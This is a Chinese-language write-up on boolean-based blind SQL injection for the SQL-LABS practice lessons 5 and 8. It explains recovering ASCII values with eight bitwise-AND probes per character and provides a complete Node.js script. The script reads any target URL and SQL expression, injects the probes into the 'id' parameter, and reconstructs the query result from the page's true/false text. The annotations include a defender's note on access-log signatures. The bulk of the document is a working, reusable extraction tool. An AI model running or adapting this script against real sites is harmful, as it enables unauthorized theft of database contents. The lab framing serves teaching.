原理
基于 SQL-LABS LESS-5、LESS-8 的 GET 型布尔注入（布尔盲注详解）。基于 MySQL 的布尔盲注，主要是判断 ascii 码值是否与猜测的值相同：通过判断页面的变化，确定 ascii 值。
由于 0-z 的 ascii 值是 48-122，而 256 = 2^0 + 2^1 + 2^2 + 2^3 + 2^4 + 2^5 + 2^6 + 2^7，因此通过按位与运算 8 次，把结果相加即可得到相应的 ascii 值，进而得到对应的字符。
115 -> 01110011
2^0 -> 00000001 = 1 115 & 2^0 = 1
2^1 -> 00000010 = 2 115 & 2^1 = 2
2^2 -> 00000100 = 4 115 & 2^2 = 0
2^3 -> 00001000 = 8 115 & 2^3 = 0
2^4 -> 00010000 = 16 115 & 2^4 = 16
2^5 -> 00100000 = 32 115 & 2^5 = 32
2^6 -> 01000000 = 64 115 & 2^6 = 64
2^7 -> 10000000 = 128 115 & 2^7 = 0
ascii(s) = 115 = 1+2+16+32+64 = 115 = 's'
通过此特性构造 GET 请求，循环请求 URL 得到 ascii 码值。一个 ascii 码值需要执行 8 次按位与，只需判断页面的变化，记录按位与得到的值，最后相加并转换得到一个字符；当转换得到的 ascii 码 = 0 时，表示没有字符了，即可退出循环，并打印该字符。
代码
const axios = require('axios')
const readline = require('readline')
// Line-oriented reader over this process's own stdin/stdout. main() awaits two
// 'line' events on it (URL, then SQL) and closes it after the second one.
const rl = readline.createInterface({ input: process.stdin, output: process.stdout })
/**
 * Sends one probe request and reads the boolean oracle from the response body.
 *
 * The oracle is the literal text "You are in": the true-branch text of the
 * target page that this script keys on (the write-up above is about the
 * sqli-labs GET lessons). When it is present the function returns the bit
 * value the caller embedded in the URL (the digits immediately before the
 * trailing "--"); otherwise it returns 0. main() sums these return values to
 * rebuild one ASCII code.
 *
 * Defender's note: every extracted character costs eight GETs that differ only
 * in the mask (1, 2, 4, ..., 128) and the substr() position, so the request
 * pattern in access logs is a clear signature even though each individual
 * response is an ordinary page.
 *
 * @param {string} url - full request URL; it must contain "<digits>--",
 *   otherwise `url.match(...)` returns null and the `[0]` below throws a
 *   TypeError.
 * @returns {Promise<number>} the embedded bit value, or 0 when the oracle text
 *   is absent. A failed request (axios rejects non-2xx responses by default)
 *   propagates as a rejection.
 */
async function inject(url) {
console.log('[+] paylod:' + url)
let res = await axios.get(url)
// Plain regex on the response text; no status-code check is made here.
const regex = /You are in/
if (regex.test(res.data)) {
// The mask is recovered from the URL itself rather than passed as a second
// parameter: take "<digits>--", then strip the non-digit tail. parseInt is
// called without a radix; the matched text is always decimal digits here.
return parseInt(url.match(/\d+\--+/)[0].replace(/\D+/, ''))
} else {
return 0
}
}
/**
 * Interactive driver: prompts for a base URL and a SQL expression on stdin,
 * then recovers the expression's result one character at a time.
 *
 * For each position `index`, eight probes are sent, one per bit mask
 * 2^0 .. 2^7. `%26` is the percent-encoded `&`, so the bitwise AND is not read
 * as a query-string separator. inject() returns the mask when the page's
 * true-branch text appears, so summing the eight results rebuilds the ASCII
 * code. A sum of 0 means every bit test came back false, which the write-up
 * treats as "no character at this position", and the loop ends.
 *
 * Notes on the code as written:
 * - `for (i = 0; ...)` has no `let`/`const`, so `i` becomes an implicit global
 *   (it would be a ReferenceError under 'use strict').
 * - `reslove` is a misspelling of `resolve`; it is only a local name.
 * - Both prompts use `rl.on('line')` rather than `once`, so the first listener
 *   stays attached; its promise has already settled, so it has no effect on
 *   later lines.
 * - Nothing catches a rejection from inject(); a failed request ends the run
 *   before the final console.log, so the partial `result` is not printed.
 *
 * @returns {Promise<void>} resolves after printing "<sql> = <result>".
 */
async function main() {
console.log('[+]Please enter Url')
// First stdin line: the base URL. The `?id=...` query string is appended below.
let url = await new Promise((reslove, reject) => {
rl.on('line', line => {
reslove(line)
})
})
console.log('[+]Please enter SQL')
// Second stdin line: the expression to extract. The reader is closed here so
// the process can exit once the loop below finishes.
let sql = await new Promise((reslove, reject) => {
rl.on('line', line => {
reslove(line)
rl.close()
})
})
let result = ''
// 1-based position passed to substr(); advanced once per recovered character.
let index = 1
let flag = true
while (flag) {
let sumAscii = 0
for (i = 0; i < 8; i++) {
// Probe i tests bit 2^i of the character at `index`; inject() returns 2^i
// when the page reports true, 0 otherwise.
let str = url + `?id=1' and ascii(substr((${sql}),${index},1)) %26 ${Math.pow(2, i)} = ${Math.pow(2, i)}--+`
sumAscii += await inject(str)
}
if (sumAscii === 0) {
// No bit set at this position: treated as end of string (see write-up).
flag = false
} else {
result += String.fromCharCode(sumAscii)
++index
}
}
console.log('\n[+]Inject_Result:' + sql + ' = ' + result)
}
// Entry point. The returned promise is neither awaited nor given a .catch(), so a
// rejection inside main() (for example a failed request) surfaces only as an
// unhandled promise rejection rather than a logged error.
main()
结果
- 爆库
- 爆表